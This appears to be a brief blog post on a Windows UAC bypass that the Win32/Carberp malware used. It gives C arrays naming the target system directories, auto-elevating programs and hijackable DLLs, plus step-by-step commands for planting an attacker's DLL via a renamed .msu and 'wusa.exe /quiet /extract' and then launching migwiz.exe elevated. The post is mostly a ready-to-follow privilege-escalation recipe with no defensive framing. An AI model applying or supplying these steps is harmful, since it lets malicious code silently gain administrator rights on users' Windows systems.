UAC Bypass: The Carberp Style

  • Wusa method used by Win32/Carberp

 const char* uacTargetDir[] = { “system32\\sysprep”“ehome” };
static const char* uacTargetApp[] = { “sysprep.exe”“mcx2prov.exe” };
static const char* uacTargetDll[] = { “cryptbase.dll”“CRYPTSP.dll” };
static const char* uacTargetMsu[] = { “cryptbase.msu”“CRYPTSP.msu” };

Steps to reproduce:
1. Make .cab archive with your own cryptbase.dll or wdscore.dll and rename it to .MSU
2. Deploy .MSU to any system directory you want with wusa.exe. For example: wusa.exe PACKAGE.MSU /quiet /extract:%WINDIR%\system32\migwiz
3. Run migwiz.exe


1. ucmWusaExtractPackage
* Purpose:
* Extract cab to protected directory using wusa.

2. ucmWusaMethod
* Purpose:
* Build and install fake msu package then run target application.

3. ucmCreateCabinetForSingleFile
* Purpose:
* Build cabinet for usage in methods where required 1 file

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: